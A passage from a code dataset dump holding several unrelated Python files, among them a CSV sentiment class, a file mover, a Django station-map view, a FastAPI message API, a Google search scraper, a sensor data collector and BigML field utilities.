get_dict_subset(self, d1, key_subset):\n return {k: d1[k] for k in key_subset}\n\n def get_winning_emotion(self, prediction_dict):\n return max(prediction_dict, key=prediction_dict.get)\n\n def get_winning_emotion_score(self, prediction_dict):\n return max(prediction_dict)\n\n def save(self):\n # Get the column names and add new columns (e.g. angry, joy, animated)\n self.fieldnames += [column for column in self.csv_data[0].keys() if column not in self.fieldnames]\n # Write the file to the same file again\n with open(self.file_path, 'w') as csvfile:\n\n # Quick fix for csv module (Can't handle kwargs as None, e.g. quotechar=None)\n if self.quotechar:\n writer = csv.DictWriter(csvfile, delimiter=self.delimiter, quotechar=self.quotechar,\n fieldnames=self.fieldnames)\n else:\n writer = csv.DictWriter(csvfile, delimiter=self.delimiter, fieldnames=self.fieldnames)\n\n writer.writeheader()\n writer.writerows(self.csv_data)\n\n\nclass CSVFilePlot(CSVFile):\n\n def __init__(self, filepath, delimiter, chart_type, quotechar=None):\n super().__init__(filepath, delimiter, quotechar=quotechar)\n self.chart_type = chart_type\n\n\n def get_plot_data(self):\n pass\n\n\n\nimport unittest\n\nclass TestCSVFile(unittest.TestCase):\n\n def setUp(self):\n self.path = 'test-file.csv'\n\n def test(self):\n csv_file = CSVFile(file_path=self.path, delimiter=',')\n\n csv_file.calculate_sentiment('comment')\n csv_file.save()\n\n def test_load_csv(self):\n c = CSVFile(file_path=self.path, delimiter=',')\n self.assertIsNotNone(c.file_path)\n self.assertIsNotNone(c.csv_data)\n self.assertEqual(type(c.csv_data), tuple)\n for each in c.csv_data:\n print(each)\n self.assertEqual(type(each), dict)\n\n def test___get_splits__(self):\n c = CSVFile(file_path=self.path, delimiter=',')\n print(list(c.__get_splits__()))\n\n def test_calculate_sentiment(self):\n c = CSVFile(file_path=self.path, delimiter=',')\n a = c.calculate_sentiment('comment')\n for each in a:\n print(each)\n","sub_path":"src/models/csv_file.py","file_name":"csv_file.py","file_ext":"py","file_size_in_byte":5321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"284368392","text":"import csv\nimport itertools\nimport shutil\nfrom PySimpleGUI import OneLineProgressMeter as progress\nfrom screen import frame\nfrom os import chdir, listdir, mkdir\nfrom platform import system\nfrom datetime import datetime\n\n\nclass MoveCSV:\n def __init__ (self, user_input):\n self.csv = str(user_input[0])\n self.files_path = str(user_input[1])\n self.csv_itens = None\n self.file_list = None\n self.file_listex = None\n self.user_os = None\n self.os_separator = None\n self.moved_dir = None\n\n def os_name(self):\n os_name = system()\n self.os_separator = '/'\n# if ('Windows' in os_name):\n # self.os_separator = '\\\\'\n # elif ('Darwin' in os_name) or ('Linux' in os_name):\n # self.os_separator = '/'\n # else:\n # self.os_separator = '\\\\'\n\n \n def get_list_files(self):\n chdir(self.files_path)\n self.file_list = listdir()\n\n def file_extension_remove(self):\n file_listex = []\n for file in self.file_list:\n if '.' in file:\n file_without_ext = file.rsplit('.', 1)\n file_listex.append(file_without_ext[0])\n else:\n file_listex.append(file)\n self.file_listex = file_listex\n\n def mkdir_moved(self):\n try:\n chdir(self.files_path)\n now = datetime.now()\n dir_name = str('MOVIDO-' + now.strftime(\"%H%M%S\"))\n mkdir(dir_name)\n self.moved_dir = dir_name\n except:\n print(\"Não foi possivel criar pasta para mover os arquivos\")\n \n def read_csv(self):\n print(\"files path: \",self.csv,\"\\nos separatou: \",self.os_separator)\n csv_path, csv_name = self.csv.rsplit(self.os_separator, 1)\n chdir(csv_path)\n csv_itens = list(itertools.chain.from_iterable(csv.reader(open(csv_name))))\n self.csv_itens = csv_itens\n \n def move_files(self):\n files_to_move = []\n current_file = 0\n chdir(self.files_path)\n for item in self.csv_itens:\n for file in self.file_list:\n if item in file:\n files_to_move.append(file)\n\n for file in files_to_move:\n current_file += 1\n if current_file < len(files_to_move):\n progress('Momento Arquivos', current_file, len(self.file_list), 'single')\n\n full_path_file = self.files_path + self.os_separator + file\n full_path_file_moved = self.files_path + self.os_separator + self.moved_dir + self.os_separator + file\n shutil.move(full_path_file, full_path_file_moved)\n\n \n\n\nuser_input = frame()\napp = MoveCSV(user_input)\napp.os_name()\napp.get_list_files()\napp.file_extension_remove()\napp.mkdir_moved()\napp.read_csv()\napp.move_files()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"80166952","text":"from ..models import Station\nfrom rest_framework.renderers import TemplateHTMLRenderer\nfrom django_filters.views import FilterView\nfrom django import forms\nimport django_filters\nfrom django.contrib.gis import geos\nfrom django.contrib.gis import measure\n\n\n\n\nACTIVE = 'ACTIVE'\nINACTIVE = 'INACTIVE'\nMAINTENANCE = 'MAINTENANCE'\nSTATUS_CHOICES = (\n (ACTIVE, 'active'),\n (INACTIVE, 'inactive'),\n (MAINTENANCE, 'maintenance'),\n)\n\n\n\n\n\nclass StationMapFilter(django_filters.FilterSet):\n current_status = django_filters.MultipleChoiceFilter(choices=STATUS_CHOICES, widget=forms.CheckboxSelectMultiple)\n longitude = django_filters.NumberFilter(widget=forms.NumberInput)\n latitude = django_filters.NumberFilter(widget=forms.NumberInput)\n\n class Meta:\n model = Station\n fields = ['current_status', 'longitude', 'latitude']\n\n\nclass StationMapView(FilterView):\n renderer_classes = [TemplateHTMLRenderer]\n template_name = 'station_map.html'\n filterset_class = StationMapFilter\n context_object_name = 'stations'\n model = Station\n\n\n def get_queryset(self, *args, **kwargs):\n query = Station.objects.all()\n if self.kwargs:\n if self.kwargs['current_status']:\n query = Station.objects.filter(category=self.kwargs['current_status'])\n\n if self.kwargs['longitude'] and self.kwargs['latitude']:\n longitude = self.kwargs['longitude']\n latitude = self.kwargs['longitude']\n current_point = geos.fromstr(\"POINT(%s %s)\" % (longitude, latitude))\n distance_from_point = {'km': 10}\n query = query.gis.filter(location__distance_lte=(current_point, measure.D(**distance_from_point)))\n query = query.distance(current_point).order_by('distance')\n return query\n","sub_path":"src/water_watch_project/water_watch_api/views/station_map_view.py","file_name":"station_map_view.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"316008619","text":"import logging\nfrom datetime import datetime\n\nfrom fastapi import APIRouter\n\nfrom app.Replicator import replicate_message\nfrom app.models.message import MessageOut, MessageIn\nfrom app.msg_list import MsgList\n\nrouter = APIRouter()\nmsg_list = MsgList()\nlogger = logging.getLogger(__name__)\n\n\n@router.get(\"/status\")\nasync def status():\n return {\"status\": \"OK\"}\n\n\n@router.get(\"/list_msg\")\nasync def list_msg():\n return msg_list.get_messages()\n\n\n@router.get(\"/list_size\")\nasync def list_size():\n return {\"list size\": len(msg_list.get_messages())}\n\n\n@router.post(\"/append_msg\", status_code=201, response_model=MessageOut)\nasync def append_msg(msg: MessageIn):\n message = MessageOut(message=msg.message, created_at=str(datetime.utcnow()))\n msg_list.add_msg(message)\n await replicate_message(message)\n return message\n","sub_path":"master/app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"30035015","text":"import http.cookiejar\nimport os\nimport time\nimport urllib.request, urllib.parse, urllib.error\nimport urllib.request, urllib.error, urllib.parse\nimport urllib.parse\nimport socket\nimport urllib.error\nfrom random import randint\n\ntry:\n import bs4 as BeautifulSoup\nexcept ImportError:\n import BeautifulSoup\n\n# URL templates to make Google searches.\nurl_search = \"http://www.google.%(domain)s/search?hl=%(language)s&q=%(search_query)s&btnG=Google+Search\"\nurl_next_page = \"http://www.google.%(domain)s/search?hl=%(language)s&q=%(search_query)s&start=%(start)d\"\n\n# Sites to block\nblocked = [\n \"http://www.youtube.com\",\n \"http://www.blogger.com\"\n]\n\nuser_agents = [\n \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5)\",\n \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\",\n \"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\",\n \"Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)\",\n \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\",\n \"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14\",\n \"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02\",\n \"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101213 Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01\",\n \"Opera/9.80 (X11; Linux i686; U; en) Presto/2.5.27 Version/10.60\"\n]\n\n# Cookie jar. Stored at the user's home folder.\nhome_folder = os.getenv('HOME')\nif not home_folder:\n home_folder = os.getenv('USERHOME')\n if not home_folder:\n home_folder = '.' # Use the current folder on error.\ncookie_jar = http.cookiejar.LWPCookieJar(os.path.join(home_folder, '.google-cookie'))\n\ntry:\n cookie_jar.load()\nexcept Exception:\n pass\n\ndef get_page(url):\n \"\"\"\n Gets a page from url\n \"\"\"\n request = urllib.request.Request(url)\n request.add_header(\"User-Agent\", user_agents[randint(0, len(user_agents) - 1)])\n cookie_jar.add_cookie_header(request)\n\n got_result = 0\n while not(got_result):\n try:\n responce = urllib.request.urlopen(request)\n got_result = 1\n except urllib.error.HTTPError as e:\n print(\"The server couldn't fulfill the request.\")\n print('Error code: ', e.code)\n exit(0)\n except urllib.error.URLError as e:\n print(\"Failed to reach a server\")\n print(\"Reason: \", e.reason)\n ans = input(\"Do you want to try again? (\\\"y\\\" or \\\"n\\\"): \")\n if (ans != \"y\"):\n exit(0)\n\n cookie_jar.extract_cookies(responce, request)\n html = responce.read()\n responce.close()\n cookie_jar.save()\n return html\n\ndef parse_result_stats(stats):\n \"\"\"\n Parse result stats and get a string of results quantity\n \"\"\"\n stat = stats.get_text()\n result_list = stat.split()\n if (\"About\" in result_list):\n return result_list[1]\n if (\"result\" or \"results\" in result_list):\n return result_list[0]\n return \"\"\n\ndef convert_int(str_in):\n '''\n Convert str to int\n '''\n if (len(str_in) == 0):\n return 0\n number = 0\n for i in range(len(str_in)):\n if (str_in[i] >= '0' and str_in[i] <= '9'):\n number *= 10\n number += int(str_in[i])\n return number\n\ndef cast_result(link, filetype= \"\"):\n try:\n for blocked_site in blocked:\n if (link.startswith(blocked_site)):\n return None\n\n o = urllib.parse.urlparse(link, 'http')\n if o.netloc and 'google' not in o.netloc:\n return link\n\n # Decode hidden URLs.\n if link.startswith('/url?'):\n link = urllib.parse.parse_qs(o.query)['q'][0]\n\n # Valid results are absolute URLs not pointing to a Google domain\n # like images.google.com or googleusercontent.com\n o = urllib.parse.urlparse(link, 'http')\n if o.netloc and 'google' not in o.netloc:\n if (filetype == \"pdf\" and link.endswith(filetype) == False):\n return None\n return link\n except Exception:\n pass\n return None\n\ndef search(query, tld = \"com\", lang = \"en\", pause = 2.0, filetype = \"pdf\"):\n \"\"\"\n Gets links from google search\n \"\"\"\n # Hashes are used to avoid repeated results\n hashes = set()\n\n # Preparing the search string\n if (filetype == ''):\n query = urllib.parse.quote_plus(query)\n else:\n query = urllib.parse.quote_plus(query + \" filetype:\" + filetype)\n\n search_url = url_search % {\"domain\" : tld, \"language\" : lang, \"search_query\" : query}\n\n html = get_page(search_url)\n\n soup = BeautifulSoup.BeautifulSoup(html)\n stats = soup.find(id = \"resultStats\")\n stat = parse_result_stats(stats)\n if (stat == \"\"):\n print(\"No results were found!\")\n print(\"Exiting...\")\n exit(0)\n results = input(\"Found about {0} results.\\nHow much to process? (0 - EXIT): \".format(stat))\n results = convert_int(results)\n if (results > convert_int(stat)):\n results = convert_int(stat)\n \n results_found = 0\n links = []\n start = 0\n while (results_found < results):\n time.sleep(pause)\n soup = BeautifulSoup.BeautifulSoup(html)\n\n anchors = soup.findAll(\"a\")\n for a in anchors:\n try:\n link = a[\"href\"]\n except KeyError:\n continue\n\n link = cast_result(link, filetype = \"pdf\")\n if not link:\n continue\n\n h = hash(link)\n if (h in hashes):\n continue\n hashes.add(h)\n\n if (results_found < results):\n links.append(link)\n results_found += 1\n else:\n break\n start = results_found\n search_url = url_next_page % {\"domain\" : tld, \"language\" : lang, \"search_query\" : query, \"start\" : start}\n time.sleep(pause)\n html = get_page(search_url)\n return links\n\nif __name__ == \"__main__\":\n import sys\n print(search(query = sys.argv[1], pause = 0.5))","sub_path":"google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":6567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"267168300","text":"from datetime import datetime\nfrom keys import weatherapikey, location # weatherapi.com\nimport requests, json, pylaxz\nimport Adafruit_DHT as ada\nfrom gpiozero import InputDevice as in_device\n\n\n\nclass NewData:\n def __init__(self, update_location=False, debug=False):\n self.debug = debug\n\n self.rain = in_device(18).is_active\n self.location = location if not update_location else self.update_loca()\n self.url = 'http://api.weatherapi.com/v1/current.json?key='+weatherapikey+'&q='+self.location\n self.get_weather()\n\n def get_temp(self):\n if self.debug:\n pylaxz.printf('get_temp: getting h & t ... ', _int=1)\n return ada.read_retry(ada.DHT11, 4)\n\n def update_loca(self):\n lat = input('lat: ')\n lon = input('lon: ')\n return lat+','+lon\n\n def get_weather(self):\n res = requests.get(url=self.url)\n self.weather = json.loads(res.text)['current']\n\n def get(self):\n new_data = list()\n h, t = None, None\n\n new_data.append(str(datetime.now())) # 0\n if self.debug:\n pylaxz.printf('sensors: date ... done.')\n\n h, t = self.get_temp()\n new_data.append(t) # 1\n new_data.append(h) # 2\n\n if self.debug:\n if h and t is not None:\n pylaxz.printf('sensors: HT ... done.', _int=1) \n else:\n pylaxz.printf('sensors: HT sensors error.', _int=1, _err=1)\n\n new_data.append(0) if self.rain else new_data.append(1) # 3\n if self.debug:\n pylaxz.printf('sensors: is_raining ... done.', _int=1)\n\n new_data.append(self.weather['temp_c']) # 4\n new_data.append(self.weather['humidity']) # 5\n new_data.append(self.weather['wind_kph']) # 6\n\n if self.debug:\n pylaxz.printf('sensors: weather data ... done', _int=1)\n\n # new_data.append('--Decision--') # 7\n\n if self.debug:\n pylaxz.printf('sensors: all done.', _int=1)\n\n return new_data\n","sub_path":"rpi-devs/datacollector.py","file_name":"datacollector.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"541401377","text":"# Purpose: Explore Random Forest Classification\n\n# reference https://chrisalbon.com/machine_learning/trees_and_forests/random_forest_classifier_example/\n\n\nfrom __future__ import print_function\nfrom sklearn.datasets import load_iris\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\nimport pandas as pd\nimport numpy as np\nnp.random.seed(0)\n\niris = load_iris()\ndf = pd.DataFrame(iris.data, columns = iris.feature_names)\nprint(\"df.head():\", df.head())\n\ndf['species'] = pd.Categorical.from_codes(iris.target, iris.target_names)\n\nprint(\"iris.target:\", iris.target)\nprint(\"iris.target_names:\", iris.target_names)\n\ndf['is_train'] = np.random.uniform(0, 1, len(df)) <= 0.75\n\ntrain, test = df[df['is_train'] == True], df[df['is_train'] == False]\n\nprint(\"len(train): \", len(train))\nprint(\"len(test): \", len(test))\n\nfeatures = df.columns[:4]\nprint(\"features:\", features)\n\ny = pd.factorize(train['species'])[0]\nprint(\"y:\", y)\n\nclf = RandomForestClassifier(n_jobs = 2, random_state = 0)\nclf.fit(train[features], y)\n\nprint(\"clf.predict(test[features]):\", clf.predict(test[features]))\n\nprint(\"clf.predict(test[features]):\", clf.predict(test[features]))\n\npreds = iris.target_names[clf.predict(test[features])]\n\nprint(\"confusion matrix:\")\nprint(pd.crosstab(\n test['species'], \n preds, \n rownames = ['Actual Species'], \n colnames = ['Predicted Species']))\n\nprint(\"list(zip(train[features], clf.feature_importances_)):\", list(zip(train[features], clf.feature_importances_)))","sub_path":"randomforestplay.py","file_name":"randomforestplay.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"511001381","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n#\n# Copyright 2012 BigML\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"A class to deal with the fields of a resource.\n\nThis module helps to map between ids, names, and column_numbers in the\nfields of source, dataset, or model. Also to validate your input data\nfor predictions or to list all the fields from a resource.\n\nfrom bigml.api import BigML\nfrom bigml.fields import Fields\n\napi = BigML()\n\nsource = api.get_source(\"source/50a6bb94eabcb404d3000174\")\nfields = Fields(source['object']['fields'])\n\ndataset = api.get_dataset(\"dataset/50a6bb96eabcb404cd000342\")\nfields = Fields(dataset['object']['fields'])\n\n# Note that the fields in a model come one level deeper\nmodel = api.get_model(\"model/50a6bbac035d0706db0008f8\")\nfields = Fields(model['object']['model']['fields'])\n\nprediction = api.get_prediction(\"prediction/50a69688035d0706dd00044d\")\nfields = Fields(prediction['object']['fields'])\n\n\n\"\"\"\nimport sys\nimport locale\n\nfrom bigml.util import invert_dictionary, map_type\nfrom bigml.util import DEFAULT_LOCALE\nfrom bigml.util import python_map_type, find_locale\n\n\nclass Fields(object):\n \"\"\"A class to deal with BigML auto-generated ids.\n\n \"\"\"\n def __init__(self, fields, missing_tokens=[''],\n data_locale=DEFAULT_LOCALE, verbose=False):\n\n find_locale(data_locale, verbose)\n\n self.fields = fields\n self.fields_by_name = invert_dictionary(fields, 'name')\n self.fields_by_column_number = invert_dictionary(fields,\n 'column_number')\n self.missing_tokens = missing_tokens\n\n def field_id(self, key):\n \"\"\"Returns a field id.\n\n \"\"\"\n\n if isinstance(key, basestring):\n try:\n id = self.fields_by_name[key]\n except KeyError:\n sys.exit(\"Error: field name '%s' does not exist\" % key)\n return id\n elif isinstance(key, int):\n try:\n id = self.fields_by_column_number[key]\n except KeyError:\n sys.exit(\"Error: field column number '%s' does not exist\" %\n key)\n return id\n\n def field_name(self, key):\n \"\"\"Returns a field name.\n\n \"\"\"\n if isinstance(key, basestring):\n try:\n name = self.fields[key]['name']\n except KeyError:\n sys.exit(\"Error: field id '%s' does not exist\" % key)\n return name\n elif isinstance(key, int):\n try:\n name = self.fields[self.fields_by_column_number[key]]['name']\n except KeyError:\n sys.exit(\"Error: field column number '%s' does not exist\" %\n key)\n return name\n\n def field_column_number(self, key):\n \"\"\"Returns a field column number.\n\n \"\"\"\n try:\n return self.fields[key]['column_number']\n except KeyError:\n return self.fields[self.fields_by_name[key]]['column_number']\n\n def len(self):\n \"\"\"Returns the number of fields.\"\n\n \"\"\"\n return len(self.fields)\n\n def pair(self, row, headers=None,\n objective_field=None, objective_field_present=None):\n \"\"\"Pairs a list of values with their respective field ids.\n\n objective_field is the column_number of the objective field.\n\n `objective_field_present` must be True is the objective_field column\n is present in the row.\n\n \"\"\"\n\n if objective_field is None:\n objective_field = sorted(self.fields_by_column_number.keys())[-1]\n\n fields_names = [self.fields[self.field_id(i)]['name'] for i in\n sorted(self.fields_by_column_number.keys())\n if i != objective_field]\n\n pair = {}\n\n if headers:\n if not isinstance(objective_field, basestring):\n objective_field = self.field_name(objective_field)\n if objective_field_present is None:\n objective_field_present = objective_field in headers\n for index in range(len(row)):\n if index < len(row) and not row[index] in self.missing_tokens:\n if (objective_field_present and\n headers[index] == objective_field):\n continue\n field = self.fields[self.fields_by_name[headers[index]]]\n row[index] = self.strip_affixes(row[index], field)\n try:\n pair.update({headers[index]:\n map_type(field['optype'])(row[index])})\n except:\n message = (u\"Mismatch input data type in field \"\n u\"\\\"%s\\\" for value %s. The expected \"\n u\"fields are: \\n%s\" %\n (field['name'],\n row[index],\n \",\".join(fields_names))).encode(\"utf-8\")\n raise Exception(message)\n else:\n if isinstance(objective_field, basestring):\n objective_field = self.field_column_number(objective_field)\n if objective_field_present is None:\n objective_field_present = len(row) == self.len()\n column_numbers = sorted(self.fields_by_column_number.keys())\n index = 0\n for column_number in column_numbers:\n if index < len(row) and not row[index] in self.missing_tokens:\n if column_number == objective_field:\n if objective_field_present:\n index += 1\n continue\n\n field = self.fields[self.field_id(column_number)]\n row[index] = self.strip_affixes(row[index], field)\n try:\n pair.update({self.field_id(column_number):\n map_type(field['optype'])(row[index])})\n except:\n message = (u\"Mismatch input data type in field \"\n u\"\\\"%s\\\" for value %s. The expected \"\n u\"fields are: \\n%s\" %\n (field['name'],\n row[index],\n \",\".join(fields_names))).encode(\"utf-8\")\n raise Exception(message)\n index += 1\n\n return pair\n\n def list_fields(self, out=sys.stdout):\n \"\"\"Lists a description of the fields.\n\n \"\"\"\n for field in [(val['name'], val['optype'], val['column_number'])\n for key, val in sorted(self.fields.items(),\n key=lambda k:\n k[1]['column_number'])]:\n out.write('[%-32s: %-16s: %-8s]\\n' % (field[0],\n field[1], field[2]))\n out.flush()\n\n def validate_input_data(self, input_data, out=sys.stdout):\n \"\"\"Validates whether types for input data match types in the\n fields definition.\n\n \"\"\"\n if isinstance(input_data, dict):\n for name in input_data:\n if name in self.fields_by_name:\n out.write('[%-32s: %-16s: %-16s: ' %\n (name, type(input_data[name]),\n self.fields[self.fields_by_name[name]]\n ['optype']))\n if (type(input_data[name]) in\n python_map_type(self.fields[self.fields_by_name[name]]\n ['optype'])):\n out.write('OK\\n')\n else:\n out.write('WRONG\\n')\n else:\n out.write(\"Field '%s' does not exist\\n\" % name)\n else:\n out.write(\"Input data must be a dictionary\")\n\n def strip_affixes(self, value, field):\n \"\"\"Strips prefixes and suffixes if present\n\n \"\"\"\n value = unicode(value, \"utf-8\")\n if 'prefix' in field and value.startswith(field['prefix']):\n value = value[len(field['prefix']):]\n if 'suffix' in field and value.endswith(field['suffix']):\n value = value[0:-len(field['suffix'])]\n return value\n","sub_path":"bigml/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":9049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"420588738","text":"# https://www.hackerrank.com/challenges/py-if-else/problem\ns = ''\n\nn = int(input())\n\nif n % 2 == 1:\n s = 'Weird'\nelif n <= 4 or n > 20:\n s = 'Not Weird'\nelse:\n s = 'Weird'\n\nprint(s)\n\n","sub_path":"9/lab/hackerrank/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"255299431","text":"a = int(input(\"Enter a number: \"))\nb = int(input(\"Enter second number: \"))\n\nprint(\"1.Addition \\n2.Substraction \\n3.Multiplication \\n4.Division\")\n\nc = int(input(\"Enter yor choice: \"))\n\nif c == 1:\n d = a + b\nelif c == 2:\n d = a - b\nelif c == 3:\n d = a * b\nelif c == 4:\n d = a / b\nelse:\n print(\"Wrong Input\")\n \n\nprint(\"The answer is: \", d)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"134364857","text":"# -*- coding: utf-8 -*-\nimport pyaudio\nimport wave\nimport numpy\n\n\ndef RecordAudioInFile(CHANNELS,RECORD_SECONDS, WAVE_OUTPUT_FILENAME = \"mfcc.wav\"):\n p = pyaudio.PyAudio()\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n RATE = 44100\n stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK)\n print(\"Recording...\")\n frames = []\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n print(\"Done recording\")\n stream.stop_stream()\n stream.close()\n p.terminate()\n wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n\ndef GetRecordAudio(CHANNELS,RECORD_SECONDS):\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n RATE = 44100\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK)\n print(\"Recording...\")\n frames = []\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n print(\"Done recording\")\n stream.stop_stream()\n stream.close()\n p.terminate()\n return numpy.fromstring(numpy.asarray(frames), dtype=numpy.int16)\n\n\n","sub_path":"AudioBytes.py","file_name":"AudioBytes.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"53649177","text":"class FloatingPoint:\n origValue = None\n sign = None\n exponent = None\n mantissa = None\n\n def outputToFile(self):\n return format(self.origValue, '013b') + \"\\n\" + format(self.sign, '01b') + \"\\n\" + format(self.exponent, '03b') + \"\\n\" + format(self.mantissa, '05b') + '\\n'\n\n def __str__(self):\n twosComp = None\n if self.origValue > 4095:\n twosComp = -8192 + self.origValue\n else:\n twosComp = self.origValue\n return format(twosComp, 'd') + \",\" + format(self.origValue, '013b') + \",\" + format(self.sign, '01b') + \",\" + format(self.exponent, '03b') + \",\" + format(self.mantissa, '05b')\n\ndef convertNumber(number):\n result = FloatingPoint()\n result.origValue = number\n if number & 0b1000000000000: #\"negative\"\n result.sign = 1\n number = 8192 - number\n else:\n result.sign = 0\n if number > 3968:\n result.exponent = 7\n result.mantissa = 31\n return result \n \n exponentTemp = 0\n mantissaTemp = 0\n\n if (number >> 12) & 0b1:\n exponentTemp = 7\n elif (number>>11) & 0b1:\n exponentTemp = 7\n elif (number>>10) & 0b1:\n exponentTemp = 6\n elif (number>>9) & 0b1:\n exponentTemp = 5\n elif (number>>8) & 0b1:\n exponentTemp = 4\n elif (number>>7) & 0b1:\n exponentTemp = 3\n elif (number>>6) & 0b1:\n exponentTemp = 2\n elif (number>>5) & 0b1:\n exponentTemp = 1\n else:\n exponentTemp = 0\n\n mantissaTemp = (number >> exponentTemp) & 0b11111\n if number == 4096:\n mantissaTemp = 31\n exponentTemp = 7\n \n sixthBit = None\n\n if exponentTemp == 0:\n sixthBit = 0 \n else:\n sixthBit = (number >> (exponentTemp-1)) & 0b1\n \n if sixthBit and mantissaTemp == 31 and exponentTemp != 7:\n #case where it overflows, so (31+1)/2 = 16, exp + 1\n #but only do this if exp isn't already max\n exponentTemp += 1\n mantissaTemp = 0b10000\n elif sixthBit and mantissaTemp < 31:\n #we need to round, but only when it won't oveflow\n mantissaTemp += 1\n \n result.exponent = exponentTemp\n result.mantissa = mantissaTemp\n return result\n\ndef convertAllNumbers():\n result = None\n START_NUM = 0\n END_NUM = 8191\n f = open('../Project2/progConversion.txt', 'w')\n for i in range(START_NUM, END_NUM+1):\n result = convertNumber(i)\n f.write(result.outputToFile())\n if i == 0 or i == 1 or i == 3967 or i == 3840 or i == 3968 or i == 3969 or i == 4095 or i == 4096 or i == 4097 or i == 8190 or i == 8191:\n print(result)\n f.close()\n\nif __name__ == \"__main__\":\n convertAllNumbers()","sub_path":"Project 2 Final/generateAnswers.py","file_name":"generateAnswers.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"650216477","text":"import requests\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\ndef heating(data):\n page = requests.get('http://www.worldclimate.com/cgi-bin/grid.pl?gr=N39W105')\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # print(soup)# prints all html used in the page\n AllheatingDays = soup.find_all('a', href=True, text='Heating Degree Days')\n for link in AllheatingDays:\n linkTag = link.get('href')\n\n # Podemos manipular linkTag para solo obtener el pedazo de estring que queremos\n print(linkTag,\"PRINTING EACH TAG\")\n print(type(linkTag))\n\n #linkTag[-7:]\n\n new_url = 'http://www.worldclimate.com/cgi-bin/' + linkTag\n # print(new_url)\n\n page_2 = requests.get(new_url)\n soup_2 = BeautifulSoup(page_2.content, 'html.parser')\n\n # we ignore the C at index 0\n antero_table = soup_2.find_all('td')[1].get_text()\n #print(antero_table) # imprime los numeros con el C y F\n\n list_of_strgs = antero_table.split() # split by space\n #nota: esta separados pero cada numero cuenta como un digit aqun que esten juntos\n # print(list_of_strgs)\n # print(type(antero_table))\n # print(len(antero_table))\n\n list_of_strgs = list_of_strgs[:13]\n print(list_of_strgs)\n\n diccionario = {}\n diccionario[linkTag[-7:]] = {}\n diccionario[linkTag[-7:]]['Heating Degree Days'] = list_of_strgs\n print(diccionario)\n\n \n return\n\n \nnom = 